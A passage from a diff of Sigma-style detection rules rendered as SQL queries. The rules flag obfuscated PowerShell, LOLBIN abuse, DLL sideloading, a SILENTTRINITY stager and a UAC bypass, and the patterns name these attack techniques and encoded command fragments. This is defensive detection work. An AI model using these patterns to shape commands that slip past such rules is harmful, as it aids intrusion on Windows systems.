'%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 